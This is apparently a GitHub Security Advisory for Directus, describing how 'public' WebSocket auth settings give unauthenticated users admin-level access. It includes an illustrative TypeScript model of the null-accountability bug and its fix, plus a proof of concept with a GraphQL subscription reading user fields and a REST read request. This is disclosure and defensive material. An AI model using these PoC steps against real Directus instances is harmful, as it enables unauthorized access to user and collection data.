GHSA-849r-qrwj-8rv4
GitHub Security Advisory
Directus allows unauthenticated access to WebSocket events and operations
Advisory Details
### Summary
When setting `WEBSOCKETS_GRAPHQL_AUTH` or `WEBSOCKETS_REST_AUTH` to "public", an unauthenticated user is able to do any of the supported operations (CRUD, subscriptions) with full admin privileges.
### Details
Accountability for unauthenticated WebSocket requests was set to `null`. Before the Permissions Policy update, `null` accountability meant "public permissions"; since that update, `null` is treated as system/admin level access. So instead of `null`, the WebSocket handlers need to use `createDefaultAccountability()` to ensure public permissions are applied to unauthenticated users.
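The following is an added, illustrative model of the defect described above, not Directus's own code: the `Accountability` type, the token lookup, the `PERMISSIONS` table and the `isAllowed` policy check are simplified assumptions built to show why a `null` accountability becomes dangerous once `null` means "system/admin" rather than "public". Only `createDefaultAccountability()` and the `public` auth mode name come from the advisory; the `strict` mode is used here as the contrasting authenticated-only mode.

```typescript
// Illustrative model of the WebSocket accountability defect (added example,
// not Directus's implementation). All types and helpers are assumptions.

type Accountability = {
  user: string | null;   // authenticated user id, or null
  role: string | null;   // role id, or null for the public role
  admin: boolean;        // true only for admin users
};

type WsAuthMode = 'public' | 'strict';   // assumed subset of the auth modes

// Mirrors what the advisory's createDefaultAccountability() is for: an
// explicit, non-admin, role-less accountability that maps onto public
// permissions instead of being `null`.
function createDefaultAccountability(): Accountability {
  return { user: null, role: null, admin: false };
}

// Constructed token table standing in for real authentication.
const KNOWN_TOKENS: Record<string, Accountability> = {
  'admin-token': { user: 'u-admin', role: 'r-admin', admin: true },
  'editor-token': { user: 'u-editor', role: 'r-editor', admin: false },
};

function authenticate(token: string | null): Accountability | null {
  return token !== null && token in KNOWN_TOKENS ? KNOWN_TOKENS[token] : null;
}

// Before the fix: an unauthenticated connection in "public" mode ends up with
// accountability === null, which was once read as "public".
function resolveAccountabilityBuggy(mode: WsAuthMode, token: string | null): Accountability | null {
  const acc = authenticate(token);
  if (acc !== null) return acc;
  if (mode === 'strict') throw new Error('authentication required');
  return null; // intended to mean "public", but see isAllowed()
}

// After the fix: the unauthenticated connection gets the default (public)
// accountability rather than null.
function resolveAccountabilityFixed(mode: WsAuthMode, token: string | null): Accountability {
  const acc = authenticate(token);
  if (acc !== null) return acc;
  if (mode === 'strict') throw new Error('authentication required');
  return createDefaultAccountability();
}

// Constructed per-role read permissions; `public` is the role-less public role.
const PERMISSIONS: Record<string, Set<string>> = {
  public: new Set(['articles']),
  'r-editor': new Set(['articles', 'drafts']),
};

// Assumed policy check with the post-Permissions-Policy semantics the
// advisory describes: a null accountability is an internal/system call and
// bypasses permissions entirely, as do admins. Everyone else is checked
// against their role's permissions.
function isAllowed(acc: Accountability | null, collection: string): boolean {
  if (acc === null || acc.admin) return true;
  const allowed = PERMISSIONS[acc.role ?? 'public'];
  return allowed !== undefined && allowed.has(collection);
}

function canReadBuggy(mode: WsAuthMode, token: string | null, collection: string): boolean {
  return isAllowed(resolveAccountabilityBuggy(mode, token), collection);
}

function canReadFixed(mode: WsAuthMode, token: string | null, collection: string): boolean {
  return isAllowed(resolveAccountabilityFixed(mode, token), collection);
}

// canReadBuggy('public', null, 'directus_users') -> true  (the defect)
// canReadFixed('public', null, 'directus_users') -> false (public role only)
```

The contrast to keep in mind is that the resolver and the policy check each looked reasonable on their own; the defect is the meaning of `null` changing underneath one of them. Representing "public" as an explicit accountability object removes the ambiguity, which is exactly what switching to `createDefaultAccountability()` does.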
### PoC
1. Start directus with
```bash
WEBSOCKETS_ENABLED=true
WEBSOCKETS_GRAPHQL_AUTH=public
WEBSOCKETS_REST_AUTH=public
```
2. Subscribe using GraphQL or REST, or do any CRUD operation on a user-created collection (system tables are not reachable through CRUD):
```gql
subscription {
  directus_users_mutated {
    key
    event
    data {
      id
      email
      first_name
      last_name
      password
    }
  }
}
```
or
```json
{
  "type": "items",
  "action": "read",
  "collection": "your_collection_name"
}
```
3a. Open up the data studio as any user. Observe how the subscriber gets notified on each page navigation (because the user's `last_page` gets updated; the `password` field is properly redacted here).
3b. Observe receiving all available items from the `your_collection_name` collection.
### Impact
This impacts any Directus instance that has either `WEBSOCKETS_GRAPHQL_AUTH` or `WEBSOCKETS_REST_AUTH` set to `public`: unauthenticated users can subscribe to changes on any collection, or perform REST CRUD operations on user-defined collections, with permissions ignored.
Dataset
Data from GitHub Advisory Database. This information is provided for research and educational purposes.